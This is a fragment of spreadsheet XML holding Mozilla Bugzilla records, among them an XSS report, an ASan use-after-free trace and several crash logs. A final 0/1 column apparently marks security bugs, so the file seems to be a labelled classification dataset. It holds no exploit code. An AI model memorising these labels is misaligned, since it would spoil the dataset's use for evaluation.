      <c r="B2546" t="inlineStr">
        <is>
          <t>2002-07-10 23:27:29 -0700</t>
        </is>
      </c>
      <c r="C2546" t="inlineStr">
        <is>
          <t>'use of uninitialized value in string eq' warning</t>
        </is>
      </c>
      <c r="D2546" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:31 -0800</t>
        </is>
      </c>
      <c r="E2546" t="n">
        <v>1</v>
      </c>
      <c r="F2546" t="n">
        <v>1</v>
      </c>
      <c r="G2546" t="n">
        <v>4</v>
      </c>
      <c r="H2546" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2546" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2546" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K2546" t="inlineStr">
        <is>
          <t>2.17</t>
        </is>
      </c>
      <c r="L2546" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2546" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2546" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2546" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2546" t="inlineStr"/>
      <c r="Q2546" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2546" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2546" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T2546" t="n">
        <v>1</v>
      </c>
      <c r="U2546" t="n">
        <v>0</v>
      </c>
      <c r="V2546" t="n">
        <v>4</v>
      </c>
      <c r="W2546" t="inlineStr">
        <is>
          <t>process_bug calls CheckCanChangeField based on the 'snapshot' of the bug. For
aliases, the alias column is NULL, and so we end up doing a string eq between
undef and ''.
The fix is to consider a NULL value to be an empty string for this test.</t>
        </is>
      </c>
      <c r="X2546" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2547">
      <c r="A2547" t="n">
        <v>718573</v>
      </c>
      <c r="B2547" t="inlineStr">
        <is>
          <t>2012-01-17 00:26:59 -0800</t>
        </is>
      </c>
      <c r="C2547" t="inlineStr">
        <is>
          <t>Potential XSS attack with ISO-2022-KR/ISO-2022-CN near 1024 bytes</t>
        </is>
      </c>
      <c r="D2547" t="inlineStr">
        <is>
          <t>2012-10-03 17:24:23 -0700</t>
        </is>
      </c>
      <c r="E2547" t="n">
        <v>1</v>
      </c>
      <c r="F2547" t="n">
        <v>1</v>
      </c>
      <c r="G2547" t="n">
        <v>3</v>
      </c>
      <c r="H2547" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2547" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2547" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K2547" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2547" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2547" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2547" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2547" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2547" t="inlineStr">
        <is>
          <t>[sg:moderate][qa!]</t>
        </is>
      </c>
      <c r="Q2547" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2547" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2547" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T2547" t="n">
        <v>1</v>
      </c>
      <c r="U2547" t="n">
        <v>0</v>
      </c>
      <c r="V2547" t="n">
        <v>29</v>
      </c>
      <c r="W2547" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.0; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Build ID: 20111220165912
Steps to reproduce:
Firefox has risk of potential XSS on ISO-2022-KR/ISO-2022-CN page.
Actual results:
On ISO-2022-KR page, characters near 1024 bytes is copied on back. On ISO-2022-CN page, characters near 1024 bytes is deleted.
Expected results:
Firefox should not copy or delete.</t>
        </is>
      </c>
      <c r="X2547" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2548">
      <c r="A2548" t="n">
        <v>765139</v>
      </c>
      <c r="B2548" t="inlineStr">
        <is>
          <t>2012-06-14 22:04:05 -0700</t>
        </is>
      </c>
      <c r="C2548" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsDocument::AdoptNode</t>
        </is>
      </c>
      <c r="D2548" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:37 -0700</t>
        </is>
      </c>
      <c r="E2548" t="n">
        <v>1</v>
      </c>
      <c r="F2548" t="n">
        <v>1</v>
      </c>
      <c r="G2548" t="n">
        <v>3</v>
      </c>
      <c r="H2548" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2548" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2548" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2548" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2548" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2548" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2548" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2548" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2548" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q2548" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2548" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2548" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2548" t="n">
        <v>1</v>
      </c>
      <c r="U2548" t="n">
        <v>0</v>
      </c>
      <c r="V2548" t="n">
        <v>27</v>
      </c>
      <c r="W2548" t="inlineStr">
        <is>
          <t>This bug reproduces quite frequently in my fuzzing, however there is not reliable reproduction or minimized testcase. The ASAN free and alloc stacks might be helpful in fixing the bug. I will update bug if i get a reliable repro.
20120613124512
http://hg.mozilla.org/mozilla-central/rev/00244ceddd42
=================================================================
==26295== ERROR: AddressSanitizer heap-use-after-free on address 0x7fe9741ba190 at pc 0x7fe983d5d952 bp 0x7fffbf205490 sp 0x7fffbf205488
READ of size 8 at 0x7fe9741ba190 thread T0
    #0 0x7fe983d5d952 in nsTArray_base&lt;nsTArrayDefaultAllocator&gt;::Length() const firefox/src/../../../dist/include/nsTArray.h:192
    #1 0x7fe984677dd2 in AdoptNodeIntoOwnerDoc(nsINode*, nsINode*) firefox/src/content/base/src/nsGenericElement.cpp:3743
    #2 0x7fe984679178 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*) firefox/src/content/base/src/nsGenericElement.cpp:4346
    #3 0x7fe984667ddc in nsINode::ReplaceOrInsertBefore(bool, nsIDOMNode*, nsIDOMNode*, nsIDOMNode**) firefox/src/content/base/src/nsGenericElement.cpp:518
    #4 0x7fe984d5525d in DeleteElementTxn::UndoTransaction() firefox/src/editor/libeditor/base/DeleteElementTxn.cpp:159
    #5 0x7fe9855391fc in nsTransactionItem::UndoTransaction(nsTransactionManager*) firefox/src/editor/txmgr/src/nsTransactionItem.cpp:198
0x7fe9741ba190 is located 272 bytes inside of 1376-byte region [0x7fe9741ba080,0x7fe9741ba5e0)
freed by thread T0 here:
    #0 0x4244e2 in free 
    #1 0x7fe9846a1beb in nsNodeUtils::LastRelease(nsINode*) firefox/src/content/base/src/nsNodeUtils.cpp:252
    #2 0x7fe984610d22 in nsDocument::Release() firefox/src/content/base/src/nsDocument.cpp:1679
    #3 0x7fe98469c8af in nsNodeInfo::Release() firefox/src/content/base/src/nsNodeInfo.cpp:185
    #4 0x7fe984643c7a in nsNodeUtils::CloneAndAdopt(nsINode*, bool, bool, nsNodeInfoManager*, JSContext*, JSObject*, nsCOMArray&lt;nsINode&gt;&amp;, nsIDOMNode**) firefox/src/../../../../dist/include/nsNodeUtils.h:272
    #5 0x7fe984628b5a in nsNodeUtils::Adopt(nsINode*, nsNodeInfoManager*, JSContext*, JSObject*, nsCOMArray&lt;nsINode&gt;&amp;) firefox/src/content/base/src/nsNodeUtils.h:172
    #6 0x7fe984677dd2 in AdoptNodeIntoOwnerDoc(nsINode*, nsINode*) firefox/src/content/base/src/nsGenericElement.cpp:3743
    #7 0x7fe984679178 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*) firefox/src/content/base/src/nsGenericElement.cpp:4346
    #8 0x7fe984667ddc in nsINode::ReplaceOrInsertBefore(bool, nsIDOMNode*, nsIDOMNode*, nsIDOMNode**) firefox/src/content/base/src/nsGenericElement.cpp:518
    #9 0x7fe984d5525d in DeleteElementTxn::UndoTransaction() firefox/src/editor/libeditor/base/DeleteElementTxn.cpp:159
    #10 0x7fe9855391fc in nsTransactionItem::UndoTransaction(nsTransactionManager*) firefox/src/editor/txmgr/src/nsTransactionItem.cpp:198
previously allocated by thread T0 here:
    #0 0x4245a2 in malloc 
    #1 0x7fe989dfe410 in moz_xmalloc firefox/src/memory/mozalloc/mozalloc.cpp:54
    #2 0x7fe9845c9f81 in nsContentUtils::CreateDocument(nsAString_internal const&amp;, nsAString_internal const&amp;, nsIDOMDocumentType*, nsIURI*, nsIURI*, nsIPrincipal*, nsIScriptGlobalObject*, DocumentFlavor, nsIDOMDocument**) firefox/src/content/base/src/nsContentUtils.cpp:4226
    #3 0x7fe98527552c in nsIDOMDOMImplementation_CreateDocument(JSContext*, unsigned int, JS::Value*) firefox/src/objdir-ff-asan/js/xpconnect/src/dom_quickstubs.cpp:6262
    #4 0x7fe98666809f in js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) firefox/src/js/src/jscntxtinlines.h:395
    #5 0x7fe98665e373 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) firefox/src/js/src/jsinterp.cpp:2435
    #6 0x7fe98664b168 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) firefox/src/js/src/jsinterp.cpp:267
    #7 0x7fe9866693c7 in js::ExecuteKernel(JSContext*, JSScript*, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) firefox/src/js/src/jsinterp.cpp:455
    #8 0x7fe986669721 in js::Execute(JSContext*, JSScript*, JSObject&amp;, JS::Value*) firefox/src/js/src/jsinterp.cpp:492
    #9 0x7fe986586744 in EvaluateUCScriptForPrincipalsCommon(JSContext*, JSObject*, JSPrincipals*, JSPrincipals*, unsigned short const*, unsigned int, char const*, unsigned int, JS::Value*, JSVersion) firefox/src/js/src/jsapi.cpp:5356
    #10 0x7fe9865869e9 in JS_EvaluateUCScriptForPrincipalsVersionOrigin firefox/src/js/src/jsapi.cpp:5393
    #11 0x7fe984aa30ae in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) firefox/src/dom/base/nsJSEnvironment.cpp:1463
    #12 0x7fe984afc51b in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) firefox/src/dom/base/nsGlobalWindow.cpp:9042
    #13 0x7fe984aedadc in nsGlobalWindow::RunTimeout(nsTimeout*) firefox/src/dom/base/nsGlobalWindow.cpp:9306
    #14 0x7fe984afb9d8 in nsGlobalWindow::TimerCallback(nsITimer*, void*) firefox/src/dom/base/nsGlobalWindow.cpp:9580
    #15 0x7fe985d542e6 in nsTimerImpl::Fire() firefox/src/xpcom/threads/nsTimerImpl.cpp:473
    #16 0x7fe985d54836 in nsTimerEvent::Run() firefox/src/xpcom/threads/nsTimerImpl.cpp:559
    #17 0x7fe985d4a914 in nsThread::ProcessNextEvent(bool, bool*) firefox/src/xpcom/threads/nsThread.cpp:624
    #18 0x7fe985cbb8fd in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/src/objdir-ff-asan/xpcom/build/nsThreadUtils.cpp:216
    #19 0x7fe985acda2d in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/src/ipc/glue/MessagePump.cpp:82
    #20 0x7fe985dbb43f in MessageLoop::Run() firefox/src/ipc/chromium/src/base/message_loop.cc:176
    #21 0x7fe9858da96e in nsBaseAppShell::Run() firefox/src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #22 0x7fe983d019c3 in XREMain::XRE_main(int, char**, nsXREAppData const*) firefox/src/toolkit/xre/nsAppRunner.cpp:3858
==26295== ABORTING
Stats: 204M malloced (270M for red zones) by 709938 calls
Stats: 38M realloced by 47616 calls
Stats: 171M freed by 456977 calls
Stats: 61M really freed by 86648 calls
Stats: 476M (121916 full pages) mmaped in 119 calls
  mmaps   by size class: 8:540639; 9:65528; 10:45045; 11:14329; 12:4096; 13:5120; 14:1792; 15:384; 16:768; 17:96; 18:176; 19:48; 20:16;
  mallocs by size class: 8:575429; 9:63598; 10:44465; 11:14417; 12:3815; 13:5233; 14:1576; 15:345; 16:719; 17:97; 18:183; 19:47; 20:14;
  frees   by size class: 8:346550; 9:48317; 10:40427; 11:11219; 12:2991; 13:4933; 14:1293; 15:295; 16:651; 17:78; 18:167; 19:44; 20:12;
  rfrees  by size class: 8:59414; 9:12639; 10:4862; 11:6621; 12:888; 13:574; 14:1048; 15:152; 16:347; 17:45; 18:25; 19:32; 20:1;
Stats: malloc large: 341 small slow: 3125
Shadow byte and word:
  0x1ffd2e837432: fd
  0x1ffd2e837430: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ffd2e837410: fd fd fd fd fd fd fd fd
  0x1ffd2e837418: fd fd fd fd fd fd fd fd
  0x1ffd2e837420: fd fd fd fd fd fd fd fd
  0x1ffd2e837428: fd fd fd fd fd fd fd fd
=&gt;0x1ffd2e837430: fd fd fd fd fd fd fd fd
  0x1ffd2e837438: fd fd fd fd fd fd fd fd
  0x1ffd2e837440: fd fd fd fd fd fd fd fd
  0x1ffd2e837448: fd fd fd fd fd fd fd fd
  0x1ffd2e837450: fd fd fd fd fd fd fd fd</t>
        </is>
      </c>
      <c r="X2548" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2549">
      <c r="A2549" t="n">
        <v>803722</v>
      </c>
      <c r="B2549" t="inlineStr">
        <is>
          <t>2012-10-19 15:29:57 -0700</t>
        </is>
      </c>
      <c r="C2549" t="inlineStr">
        <is>
          <t>[Camera] Crash when choosing a wallpaper using the Camera option</t>
        </is>
      </c>
      <c r="D2549" t="inlineStr">
        <is>
          <t>2012-10-23 19:44:42 -0700</t>
        </is>
      </c>
      <c r="E2549" t="n">
        <v>1</v>
      </c>
      <c r="F2549" t="n">
        <v>1</v>
      </c>
      <c r="G2549" t="n">
        <v>6</v>
      </c>
      <c r="H2549" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2549" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J2549" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2549" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2549" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2549" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N2549" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2549" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2549" t="inlineStr">
        <is>
          <t>[dupeme]</t>
        </is>
      </c>
      <c r="Q2549" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2549" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2549" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2549" t="n">
        <v>1</v>
      </c>
      <c r="U2549" t="n">
        <v>0</v>
      </c>
      <c r="V2549" t="n">
        <v>7</v>
      </c>
      <c r="W2549" t="inlineStr">
        <is>
          <t>Camera crashes when launching it from wallpaper &gt; Camera web activity.   
Logcat: 
10-19 21:10:16.934: I/IdleService(3539): next timeout 1350681017941762 usec (1000 msec from now)
10-19 21:10:16.934: I/IdleService(3539): SetTimerExpiryIfBefore: next timeout 1350681017941762 usec
10-19 21:10:16.934: I/IdleService(3539): reset timer expiry from 5645648308926249 usec to 1350681017951762 usec
10-19 21:10:16.934: I/IdleService(3539): Reset idle timeout: tell observer 47dad270 user is back
10-19 21:10:16.934: I/IdleService(3539): Reset idle timeout: tell observer 47dad270 user is back
10-19 21:10:16.934: I/IdleService(3539): Reset idle timeout: tell observer 47dad270 user is back
10-19 21:10:16.934: I/IdleService(3539): Reset idle timeout: tell observer 47dad270 user is back
10-19 21:10:16.934: I/IdleService(3539): Reset idle timeout: tell observer 47dad270 user is back
10-19 21:10:16.934: I/IdleService(3539): Reset idle timeout: tell observer 47dad270 user is back
10-19 21:10:17.064: I/GeckoDump(3539): XXX FIXME : Got a mozContentEvent: activity-choice
10-19 21:10:17.244: E/GeckoConsole(3539): Content JS INFO at app://system.gaiamobile.org/js/window_manager.js:836 in createFrame: %%%%% Launching Camera as remote (OOP)
10-19 21:10:17.244: E/GeckoConsole(3539): Content JS INFO at app://system.gaiamobile.org/js/window_manager.js:836 in createFrame: %%%%% Launching Camera as remote (OOP)
10-19 21:10:17.294: D/memalloc(3539): /dev/pmem: Allocated buffer base:0x4be00000 size:327680 offset:3457024 fd:221
10-19 21:10:17.344: E/GeckoConsole(3539): Content JS LOG at app://system.gaiamobile.org/js/window_manager.js:396 in anonymous: Window Manager: No screenshot in database. This is expected from a fresh installed app.
10-19 21:10:17.344: E/GeckoConsole(3539): Content JS LOG at app://system.gaiamobile.org/js/window_manager.js:396 in anonymous: Window Manager: No screenshot in database. This is expected from a fresh installed app.
10-19 21:10:17.354: D/memalloc(3539): /dev/pmem: Allocated buffer base:0x4be00000 size:327680 offset:4296704 fd:239
10-19 21:10:17.565: D/memalloc(3539): /dev/pmem: Freeing buffer base:0x4c33b000 size:614400 offset:5484544 fd:200
10-19 21:10:17.565: D/memalloc(3539): /dev/pmem: Freeing buffer base:0x4c3d1000 size:614400 offset:6098944 fd:224
10-19 21:10:17.565: D/memalloc(3539): /dev/pmem: Freeing buffer base:0x4c219000 size:327680 offset:4296704 fd:239
10-19 21:10:17.565: D/memalloc(3539): /dev/pmem: Freeing buffer base:0x4c14c000 size:327680 offset:3457024 fd:221
10-19 21:10:17.665: E/profiler(4025): Registering start signal
10-19 21:10:17.935: I/IdleService(3539): Get idle time: time since reset 876 msec
10-19 21:10:17.935: I/IdleService(3539): Idle timer callback: current idle time 876 msec
10-19 21:10:17.935: I/IdleService(3539): next timeout 1350681018066090 usec (123 msec from now)
10-19 21:10:17.935: I/IdleService(3539): SetTimerExpiryIfBefore: next timeout 1350681018066090 usec
10-19 21:10:17.935: I/IdleService(3539): reset timer expiry from 0 usec to 1350681018076090 usec
10-19 21:10:18.065: E/GeckoConsole(4025): [JavaScript Warning: "Unknown property '-moz-align-self'.  Declaration dropped." {file: "resource://gre-resources/ua.css" line: 44}]
10-19 21:10:18.065: I/IdleService(3539): Get idle time: time since reset 1010 msec
10-19 21:10:18.065: I/IdleService(3539): Idle timer callback: current idle time 1010 msec
10-19 21:10:18.065: I/IdleService(3539): next timeout 5645648312066090 usec (4294967293989 msec from now)
10-19 21:10:18.065: I/IdleService(3539): SetTimerExpiryIfBefore: next timeout 5645648312066090 usec
10-19 21:10:18.065: I/IdleService(3539): reset timer expiry from 0 usec to 5645648312076090 usec
10-19 21:10:18.065: I/IdleService(3539): Idle timer callback: tell observer 47dad270 user is idle
10-19 21:10:18.065: I/IdleService(3539): Idle timer callback: tell observer 47dad270 user is idle
10-19 21:10:18.065: I/IdleService(3539): Idle timer callback: tell observer 47dad270 user is idle
10-19 21:10:18.065: I/IdleService(3539): Idle timer callback: tell observer 47dad270 user is idle
10-19 21:10:18.065: I/IdleService(3539): Idle timer callback: tell observer 47dad270 user is idle
10-19 21:10:18.065: I/IdleService(3539): Idle timer callback: tell observer 47dad270 user is idle
10-19 21:10:18.195: I/Gecko(3539): [Parent 3539] WARNING: pipe error (219): Connection reset by peer: file /data/jenkins/jobs/build-unagi/workspace/gecko/ipc/chromium/src/chrome/common/ipc_channel_posix.cc, line 421
10-19 21:10:18.275: I/Gecko(3539): [Parent 3539] WARNING: waitpid failed pid:4025 errno:10: file /data/jenkins/jobs/build-unagi/workspace/gecko/ipc/chromium/src/base/process_util_posix.cc, line 260
10-19 21:10:18.295: D/memalloc(3539): /dev/pmem: Allocated buffer base:0x4be00000 size:122880 offset:2637824 fd:200
10-19 21:10:18.315: D/memalloc(3539): /dev/pmem: Allocated buffer base:0x4be00000 size:122880 offset:2760704 fd:219
10-19 21:10:20.277: I/Gecko(3539): [Parent 3539] WARNING: waitpid failed pid:4025 errno:10: file /data/jenkins/jobs/build-unagi/workspace/gecko/ipc/chromium/src/base/process_util_posix.cc, line 260
10-19 21:10:20.277: I/Gecko(3539): [Parent 3539] WARNING: Failed to deliver SIGKILL to 4025!(3).: file /data/jenkins/jobs/build-unagi/workspace/gecko/ipc/chromium/src/chrome/common/process_watcher_posix_sigchld.cc, line 118
10-19 21:10:22.259: D/memalloc(3539): /dev/pmem: Freeing buffer base:0x4c084000 size:122880 offset:2637824 fd:200
10-19 21:10:22.259: D/memalloc(3539): /dev/pmem: Freeing buffer base:0x4c0a2000 size:122880 offset:2760704 fd:219
Environment: 
- daily otoro 10-19-2012
gecko: f08661db7f19cf84e7ede83c360430f0b20bbbd2
gaia: 83ade3896454efca57cfabbb168873ab7709ab51
Repro:
1) launch settings &gt; Display
2) click the wallpaper image
3) pick "Camera" from the web activities
4) Verify crash.
Expected:
- no crash, camera app launches
Actual:
- camera activity crashes, never launches</t>
        </is>
      </c>
      <c r="X2549" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2550">
      <c r="A2550" t="n">
        <v>948335</v>
      </c>
      <c r="B2550" t="inlineStr">
        <is>
          <t>2013-12-10 01:46:31 -0800</t>
        </is>
      </c>
      <c r="C2550" t="inlineStr">
        <is>
          <t>'ready to release' emails not being sent for release</t>
        </is>
      </c>
      <c r="D2550" t="inlineStr">
        <is>
          <t>2015-01-11 20:18:46 -0800</t>
        </is>
      </c>
      <c r="E2550" t="n">
        <v>1</v>
      </c>
      <c r="F2550" t="n">
        <v>1</v>
      </c>
      <c r="G2550" t="n">
        <v>5</v>
      </c>
      <c r="H2550" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2550" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2550" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K2550" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2550" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2550" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2550" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2550" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2550" t="inlineStr">
        <is>
          <t xml:space="preserve">[kanban:engops:https://mozilla.kanbanize.com/ctrl_board/6/1897] </t>
        </is>
      </c>
      <c r="Q2550" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2550" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2550" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2550" t="n">
        <v>1</v>
      </c>
      <c r="U2550" t="n">
        <v>0</v>
      </c>
      <c r="V2550" t="n">
        <v>9</v>
      </c>
      <c r="W2550" t="inlineStr">
        <is>
          <t>The weights of the mirrors have changed a lot since the days when we had volunteers, but we still expect 45k uptake for release builds. These days we have a little over 10k for updates, and 2 million for installers. (IT does it this way to get the behavior we want from bouncer, rather than anything else).
We also don't need to make any distinction between uptake before notifying for 'ready for release' and 'ready to releasetest testing', since there is very short 'sync lag' between our CDN origin server and the CDN itself. Just 5 mins for the bouncer sentry to go around and request the files, and enable the CDN in bouncer.</t>
        </is>
      </c>
      <c r="X2550" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2551">
      <c r="A2551" t="n">
        <v>1482659</v>
      </c>
      <c r="B2551" t="inlineStr">
        <is>
          <t>2018-08-11 11:55:42 -0700</t>
        </is>
      </c>
      <c r="C2551" t="inlineStr">
        <is>
          <t>startup crash in soundInitWavHdr playing sound file for new mail</t>
        </is>
      </c>
      <c r="D2551" t="inlineStr">
        <is>
          <t>2019-08-07 17:21:27 -0700</t>
        </is>
      </c>
      <c r="E2551" t="n">
        <v>1</v>
      </c>
      <c r="F2551" t="n">
        <v>1</v>
      </c>
      <c r="G2551" t="n">
        <v>3</v>
      </c>
      <c r="H2551" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2551" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2551" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K2551" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2551" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2551" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N2551" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2551" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2551" t="inlineStr">
        <is>
          <t>[startupcrash][tbird topcrash][regression: TB60][post-critsmash-triage][adv-esr60.5+]</t>
        </is>
      </c>
      <c r="Q2551" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2551" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2551" t="inlineStr">
        <is>
          <t>mozilla66</t>
        </is>
      </c>
      <c r="T2551" t="n">
        <v>1</v>
      </c>
      <c r="U2551" t="n">
        <v>0</v>
      </c>
      <c r="V2551" t="n">
        <v>73</v>
      </c>
      <c r="W2551" t="inlineStr">
        <is>
          <t>For reasons unknown, this is has gone from obsurity in 52.x (almost zero crashes), to #3 crash for 60.0 - visually seen in the graph https://crash-stats.mozilla.com/signature/?product=Thunderbird&amp;signature=soundInitWavHdr&amp;date=%3E%3D2018-05-11T10%3A52%3A28.000Z&amp;date=%3C2018-08-11T10%3A52%3A28.000Z&amp;_columns=date&amp;_columns=product&amp;_columns=version&amp;_columns=build_id&amp;_columns=platform&amp;_columns=reason&amp;_columns=address&amp;_columns=install_time&amp;_sort=-date&amp;page=1#summary which also shows this as a startup crash
This bug was filed from the Socorro interface and is
report bp-19d63b14-ab22-4b0d-ad96-156eb0180808.
=============================================================
Top 10 frames of crashing thread:
0 winmm.dll soundInitWavHdr 
1 winmm.dll soundLoadMemory 
2 winmm.dll _EH_prolog3_catch_GS 
3 winmm.dll mmWndProc 
4 user32.dll _InternalCallWinProc 
5 user32.dll UserCallWinProcCheckWow 
6 user32.dll DispatchMessageWorker 
7 user32.dll DispatchMessageA 
8 winmm.dll mciwindow 
9 kernel32.dll BaseThreadInitThunk 
=============================================================</t>
        </is>
      </c>
      <c r="X2551" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2552">
      <c r="A2552" t="n">
        <v>716345</v>
      </c>
      <c r="B2552" t="inlineStr">
        <is>
          <t>2012-01-08 03:17:19 -0800</t>
        </is>
      </c>
      <c r="C2552" t="inlineStr">
        <is>
          <t>[skiplist] Add stable NSPR and NSS API to prefixSignatureRegEx</t>
        </is>
      </c>
      <c r="D2552" t="inlineStr">
        <is>
          <t>2016-05-27 19:54:56 -0700</t>
        </is>
      </c>
      <c r="E2552" t="n">
        <v>1</v>
      </c>
      <c r="F2552" t="n">
        <v>1</v>
      </c>
      <c r="G2552" t="n">
        <v>4</v>
      </c>
      <c r="H2552" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2552" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2552" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K2552" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2552" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2552" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2552" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2552" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2552" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q2552" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2552" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2552" t="inlineStr">
        <is>
          <t>3</t>
        </is>
      </c>
      <c r="T2552" t="n">
        <v>1</v>
      </c>
      <c r="U2552" t="n">
        <v>0</v>
      </c>
      <c r="V2552" t="n">
        <v>19</v>
      </c>
